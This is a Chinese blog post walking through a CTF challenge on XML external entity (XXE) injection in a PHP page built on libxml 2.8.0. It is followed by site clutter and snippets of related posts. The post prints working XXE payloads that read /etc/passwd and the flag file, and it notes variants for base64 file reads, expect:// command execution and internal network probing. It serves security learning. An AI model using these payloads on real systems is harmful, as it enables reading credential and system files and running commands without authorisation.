4、PHP的xml注入漏洞（xxe）

你挡我发光了

已于 2024-05-21 16:38:01 修改

阅读量648

点赞数 1

分类专栏： CTF web类文章标签： php xml 开发语言

于 2024-05-21 16:19:37 首次发布

本文链接：https://blog.csdn.net/weixin_51520483/article/details/139095473

版权

CTF web类专栏收录该内容

7 篇文章 0 订阅

订阅专栏

青少年ctf：PHP的XXE

1、打开网页是一个PHP版本页面

2、CTRL+f搜索xml，发现2.8.0版本，含有xml漏洞

3、bp抓包

4、使用代码出发bug

GET /simplexml_load_string.php HTTP/1.1

补充：

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>


/* 
1.读取任意文件
file 协议，file:///etc//passwd
php 协议，php://filter/read=convert.base64-encode/resource=index.php
2.执行系统命令
PHP环境中PHP的expect模块被加载
expect://ipconfig
3.内网探测
http：//192.168.0.128:80
参见：https://xz.aliyun.com/t/3357#toc-11
*/

5、在触发bug的包下面加上，获取flag

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>&xxe;</name>
</root>

6、查看其他文件etc/passwd

拓展内容：一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

你挡我发光了

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

PHP环境 XML外部实体注入漏洞（XXE）

weixin_45022281的博客

10-13

1730

PHP环境 XML外部实体注入漏洞（XXE）漏洞描述： libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞，本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。风险等级：高影响版本： libxml2.8.0版本漏洞复现： [1] dom.php 读取敏感文件 Simple XXE Payload： <?xml version="1.0"?> <!DOCTYPE ANY[ <!E

java xml 实体注入_XML外部实体注入漏洞(XXE)

weixin_35917998的博客

02-16

1187

转自腾讯安全应急响应中心一、XML基础知识XML用于标记电子文件使其具有结构性的标记语言，可以用来标记数据、定义数据类型，是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明，也可以外部引用。内部声明DTD根元素 [元素声明]>引...

参与评论您还未登录，请先登录后发表或查看评论

[Vulhub] PHP环境 XML外部实体注入漏洞（XXE）

weixin_45605352的博客

05-07

3732

0x01 预备知识 XXE是什么？ XXE(XML External Entity Injection)也就是XML外部实体注入，XXE漏洞发生在应用程序解析XML输入时，XML文件的解析依赖libxml 库，而 libxml2.9 以前的版本默认支持并开启了对外部实体的引用，服务端解析用户提交的XML文件时，未对XML文件引用的外部实体（含外部一般实体和外部参数实体）做合适的处理，并且实体的URL支持 file:// 和 ftp:// 等协议，导致可加载恶意外部文件和代码，造成任意文件读取、命令执行、

XXE payload总结

最新发布

ULGANOY的博客

09-03

1057

XXE payload的记录

PHP XXE漏洞

qq_61553520的博客

05-13

254

libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞，本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。

php代码审计之xxe

qq_42307546的博客

06-04

643

xml

Web渗透（十一）XML注入(XXE)

weixin_39157582的博客

11-23

2014

@TOC 0x00 前言 0x01 XML和DTD XXE漏洞全程为XML External Entity Injection ，也就是XML外部实体注入漏洞。 1、什么是XML？百度百科可扩展标记语言，标准通用标记语言的子集，是一种用于标记电子文件使其具有结构性的标记语言。简单来说，它是一种语言，表现形式类似于HTML（超文本标记语言），而XML和HTML的差别在于，HTML是用于展示数据和页面，而XML是为了更好的存储和传输数据。 HTML的容错能力使得格式可以不必十分规范，例如有时可能忘记

WEB安全之XXE实体注入漏洞.pdf

12-12

然而，XML的这种灵活性也引入了安全风险，如XXE（XML External Entity Injection，XML外部实体注入漏洞）。 **0x01 XML基础知识** XML文档由XML声明、DTD（Document Type Definition）文档类型定义（可选）和文档...

XML外部实体注入漏洞——XXE简单分析

未完成的歌~的博客

02-01

1878

前言：前几天做了南邮 NJUPT CTF的几道题，感觉自己要学的的东西还有太多！今天借着比赛中的一道Web题来系统的学习下XML外部实体注入(XML External Entity Injection) 题目：Fake XML cookbook 题目：Fake XML cookbook 平台暂时还未关闭，想要复现的抓紧了！网址：https://nctf.x1c.club/challenges#Web ...

（vulhub）PHP环境XML外部实体注入漏洞（XXE）

Gjqhs的博客

03-08

1064

Vulhub 靶场安装_Gjqhs的博客-CSDN博客查询对应镜像打开docker systemctl start docker 设置docker自启动 systemctl enable docker 查看docker状态 systemctl status docker 查找xxe镜像 docker search php_xxe 拉取镜像，（有可能超时，如下）启动xxe服务访问即可见此页面，可看到其版本为2.8.0。 http:...

【渗透测试】XXE（外部实体注入）：PHP_XXE解题简记

weixin_53972936的博客

10-26

1667

XXE漏洞发生在应用程序解析XML输入时，并没有禁止外部实体的加载，当允许引用外部实体时，通过构造恶意内容，可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。

PHPYun XML 注入漏洞

whatiwhere的博客

12-06

1760

实验环境实验环境操作机系统：WindowsXP 目标网站：www.test.ichunqiu 实验目的掌握本次漏洞的原理及其利用方法学会如何修复Sql注入漏洞实验工具 Hack Bar ：它是火狐浏览器的一款插件，包含一些常用的工具。(SQL injection,XSS,加密等)，web开发人员可以利用它，快速构建一个http请求，或者用它快速实现某种算法等，本次实验主要用到它的...

PHP环境 XML外部实体注入漏洞 XXE 漏洞复现

ADummy的博客

02-26

498

PHP环境 XML外部实体注入漏洞（XXE） by ADummy 0x00利用路线构造XXE payload—>POST发送—>有回显（也有blind xxe 参考资料） 0x01漏洞介绍 PHP环境 XML外部实体注入漏洞（XXE） 0x02漏洞复现 payload <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xx

PHP环境 XML外部实体注入漏洞

Snowflake1997的博客

03-08

285

漏洞描述 libxml2.9.0以后，默认不解析外部实体，导致XXE漏洞逐渐消亡。为了演示PHP环境下的XXE漏洞，本例会将libxml2.8.0版本编译进PHP中。PHP版本并不影响XXE利用。影响范围 libxml2.8.0版本复现过程使用vulhub cd /vulhub/php/php_xxe 进入目录 docker-compose up -d 启动访问抓包，刷新一下页面就行发送到repeater 进行修改在最后增加上这个代码 <?.

XML外部实体注入--XXE漏洞

qq_62793621的博客

05-16

1739

XXE的原理及常见利用方式。

XXE漏洞详解：XML语法、攻防策略与实战示例

XXE全称XML External Entity Injection，即XML外部实体注入攻击，是针对XML文档处理中的一种严重安全漏洞。它源于对XML语法规则的不当使用，特别是当系统处理包含外部实体引用的不安全输入时，可能导致数据泄露或...